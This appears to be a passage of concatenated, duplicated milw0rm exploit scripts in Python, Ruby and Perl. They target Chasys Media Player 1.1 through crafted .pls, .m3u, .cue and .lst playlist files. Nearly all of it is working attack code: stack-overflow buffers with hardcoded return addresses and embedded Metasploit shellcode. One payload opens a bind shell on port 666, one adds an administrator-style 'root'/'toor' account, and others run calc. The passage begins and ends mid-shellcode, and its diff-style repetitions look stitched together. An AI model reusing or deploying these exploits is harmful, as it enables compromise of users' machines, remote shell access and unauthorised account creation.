"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x36\x43\x36\x42\x50\x5a")
exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D
try:
out_file = open("exploit.pls",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!"
except:
print "Error"
# milw0rm.com [2009-03-18]
#usage: exploit.py
print "**************************************************************************"
print " Chasys Media Player(pls File) Local Stack overflow Exploit\n"
print " Founder: zAx my friend :)"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Good news : The program didn't crash after running the exploit :)"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A"
header += "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74"
header += "\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65"
header += "\x31\x3D"
buff1 = "\x41" * 260
eip = "\x5D\x38\x82\x7C" # call esp kernel32.dll
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x37"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x34"
"\x4b\x38\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x36\x43\x36\x42\x50\x5a")
exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D
try:
out_file = open("exploit.pls",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!"
except:
print "Error"
# milw0rm.com [2009-03-18]


@ -1,50 +1,50 @@
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]


@ -1,50 +1,50 @@
#!/usr/bin/python
# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "#EXTM3U\n"
junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.m3u","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]
#!/usr/bin/python
# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "#EXTM3U\n"
junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.m3u","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]


@ -1,72 +1,72 @@
#!/usr/bin/env ruby
# Chasys Media Player 1.1 .cue file Stack Overflow Exploit
# By Stack
# Mountassif Moad
# cat thnx.txt
# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d
#
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.cue'
time1 = Time.new
$VERBOSE=nil
Header1= "\x5B\x70\x6C\x61\x79\x6C\x69"+
"\x73\x74\x5D\x0D\x46\x69\x6C"+
"\x65\x31\x3D"
Header2= "\x0D\x0A\x54\x52\x41\x43\x4B\x20\x30\x31\x20\x4D\x4F\x44\x45\x31\x2F\x32"+
"\x33\x35\x32\x0D\x0A\x20\x20\x20\x49\x4E\x44\x45\x58\x20\x30\x31"+
"\x20\x30\x30\x3A\x30\x30\x3A\x30\x30"
# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"
Over = "\x41" * 260
Nop = "\x90" * 20
Ret = "\x5D\x38\x82\x7C" # CALL ESP kernel32.dll Sp 2 FR & EN
# "\x35\x16\x39\x77" # CALL ESP Universel If box Have .Net 2
# ( this is my methode if i dont find an universel address in app i find adress
# in some famouse softwar who the victime 90 % install it )
Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2
File.open( files+".cue", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".cue :d"
end
# milw0rm.com [2009-03-19]
#!/usr/bin/env ruby
# Chasys Media Player 1.1 .cue file Stack Overflow Exploit
# By Stack
# Mountassif Moad
# cat thnx.txt
# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d
#
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.cue'
time1 = Time.new
$VERBOSE=nil
Header1= "\x5B\x70\x6C\x61\x79\x6C\x69"+
"\x73\x74\x5D\x0D\x46\x69\x6C"+
"\x65\x31\x3D"
Header2= "\x0D\x0A\x54\x52\x41\x43\x4B\x20\x30\x31\x20\x4D\x4F\x44\x45\x31\x2F\x32"+
"\x33\x35\x32\x0D\x0A\x20\x20\x20\x49\x4E\x44\x45\x58\x20\x30\x31"+
"\x20\x30\x30\x3A\x30\x30\x3A\x30\x30"
# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"
Over = "\x41" * 260
Nop = "\x90" * 20
Ret = "\x5D\x38\x82\x7C" # CALL ESP kernel32.dll Sp 2 FR & EN
# "\x35\x16\x39\x77" # CALL ESP Universel If box Have .Net 2
# ( this is my methode if i dont find an universel address in app i find adress
# in some famouse softwar who the victime 90 % install it )
Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2
File.open( files+".cue", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".cue :d"
end
# milw0rm.com [2009-03-19]


@ -1,31 +1,31 @@
#!/usr/bin/perl
# --------------------------------------------------------------
# Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit
# Discovered and Exploited By : zAx
# Thanks to all my friends !
# --------------------------------------------------------------
my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
my $junk = "\x41" x 260;
my $eip = "\x5D\x38\x82\x7C"; # Windows XP SP2 English ..
my $nopsleds = "\x90" x 19; # I Love you
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $sc =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
"\x51\x92\x42\x83";
my $exploit = $header.$junk.$eip.$nopsleds.$sc;
$file = "zAx.lst";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";
# milw0rm.com [2009-03-19]
#!/usr/bin/perl
# --------------------------------------------------------------
# Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit
# Discovered and Exploited By : zAx
# Thanks to all my friends !
# --------------------------------------------------------------
my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
my $junk = "\x41" x 260;
my $eip = "\x5D\x38\x82\x7C"; # Windows XP SP2 English ..
my $nopsleds = "\x90" x 19; # I Love you
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $sc =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
